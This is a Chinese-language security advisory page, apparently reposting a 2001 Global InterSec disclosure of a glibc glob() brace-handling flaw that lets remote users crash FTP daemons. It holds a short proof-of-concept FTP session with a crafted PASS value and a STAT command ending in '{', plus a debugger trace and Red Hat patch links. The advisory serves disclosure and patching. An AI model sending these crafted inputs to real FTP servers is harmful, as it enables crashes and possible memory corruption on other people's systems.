首页焦点原创安全文摘安全工具安全漏洞焦点项目焦点论坛关于我们

English Version

最近严重漏洞

Microsoft RPC接口远程任意代码可执行漏洞

Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞

Microsoft Windows CreateFile API命名管道权限提升漏洞

[Global InterSec 2001121001] glibc glob函数存在问题

发布时间：2001-12-18
更新时间：2001-12-18
严重程度：高
威胁程度：远程管理员权限
错误类型：意外情况处置错误
利用方式：服务器模式

受影响系统

glibc glob

详细描述
glibc包含一个globbing 错误可以导致远程攻击，假如软件使用了glob扩展功能如FTP。

glibc glob()函数允许程序按照规则搜索匹配指定类型的文件，Glibc也有globfree()函数实现。不过glob函数在处理带"{"(0x7b)字符的字符串时回出现错误，导致
next_brace_sub() 读它不能够读的内存区域，最后导致程序产生SEGV。

测试代码
: 220 localhost FTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
   -> USER ftp
   : 331 Guest login ok, type your name as password.
   Sleeping for 10 seconds...
   -> PASS AAAAAAAAAAAAAAAAAAA\xef\xef\xbe\xad\xde # ( <19 Bytes> <Addr to
write> <Glob char>)
   : 230 Guest login ok, access restrictions apply.
   -> STAT ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{

   #0 0x400f7968 in globfree () at ../sysdeps/generic/glob.c:1055
   #1 0x8051b0b in yyparse () at ftpcmd.y:1138
   # 2 0x804b455 in main (argc=3D1094795585, argv=3D0xbffff864,
   envp=3D0xbffff86c) at ftpd.c:715

检查积存器发现地址不合法而导致FTP守护程序产生SEG错误：

   <snip>
   esi 0xdeadbeef -559038737
   edi 0xdeadbeef -559038737
   </snip>

解决方案
采用如下最新程序：

Red Hat Linux 6.2:

SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/glibc-2.1.3-23.src.rpm

alpha:
ftp://updates.redhat.com/6.2/en/os/alpha/glibc-2.1.3-23.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/glibc-devel-2.1.3-23.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/glibc-profile-2.1.3-23.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/nscd-2.1.3-23.alpha.rpm

i386:
ftp://updates.redhat.com/6.2/en/os/i386/glibc-2.1.3-23.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/glibc-devel-2.1.3-23.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/glibc-profile-2.1.3-23.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/nscd-2.1.3-23.i386.rpm

sparc:
ftp://updates.redhat.com/6.2/en/os/sparc/glibc-2.1.3-23.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/glibc-devel-2.1.3-23.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/glibc-profile-2.1.3-23.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/nscd-2.1.3-23.sparc.rpm

sparcv9:
ftp://updates.redhat.com/6.2/en/os/sparcv9/glibc-2.1.3-23.sparcv9.rpm

Red Hat Linux 7.0:

SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/glibc-2.2.4-18.7.0.3.src.rpm

alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/glibc-2.2.4-18.7.0.3.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/glibc-devel-2.2.4-18.7.0.3.alpha.rp
m
ftp://updates.redhat.com/7.0/en/os/alpha/glibc-profile-2.2.4-18.7.0.3.alpha.
rpm
ftp://updates.redhat.com/7.0/en/os/alpha/glibc-common-2.2.4-18.7.0.3.alpha.r
pm
ftp://updates.redhat.com/7.0/en/os/alpha/nscd-2.2.4-18.7.0.3.alpha.rpm

alphaev6:
ftp://updates.redhat.com/7.0/en/os/alphaev6/glibc-2.2.4-18.7.0.3.alphaev6.rp
m

i386:
ftp://updates.redhat.com/7.0/en/os/i386/glibc-2.2.4-18.7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/glibc-devel-2.2.4-18.7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/glibc-profile-2.2.4-18.7.0.3.i386.rp
m
ftp://updates.redhat.com/7.0/en/os/i386/glibc-common-2.2.4-18.7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/nscd-2.2.4-18.7.0.3.i386.rpm

i686:
ftp://updates.redhat.com/7.0/en/os/i686/glibc-2.2.4-18.7.0.3.i686.rpm

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/glibc-2.2.4-19.3.src.rpm

alpha:
ftp://updates.redhat.com/7.1/en/os/alpha/glibc-2.2.4-19.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/glibc-devel-2.2.4-19.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/glibc-profile-2.2.4-19.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/glibc-common-2.2.4-19.3.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/nscd-2.2.4-19.3.alpha.rpm

alphaev6:
ftp://updates.redhat.com/7.1/en/os/alphaev6/glibc-2.2.4-19.3.alphaev6.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/glibc-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/glibc-devel-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/glibc-profile-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/glibc-common-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/nscd-2.2.4-19.3.i386.rpm

i686:
ftp://updates.redhat.com/7.1/en/os/i686/glibc-2.2.4-19.3.i686.rpm

ia64:
ftp://updates.redhat.com/7.1/en/os/ia64/glibc-2.2.4-19.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/glibc-devel-2.2.4-19.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/glibc-profile-2.2.4-19.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/glibc-common-2.2.4-19.3.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/nscd-2.2.4-19.3.ia64.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/glibc-2.2.4-19.3.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/glibc-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/glibc-devel-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/glibc-profile-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/glibc-common-2.2.4-19.3.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nscd-2.2.4-19.3.i386.rpm

i686:
ftp://updates.redhat.com/7.2/en/os/i686/glibc-2.2.4-19.3.i686.rpm.

相关信息
tom.parker@globalintersec.com
参考：http://www.globalintersec.com/adv/glibc-glob-2001121001.txt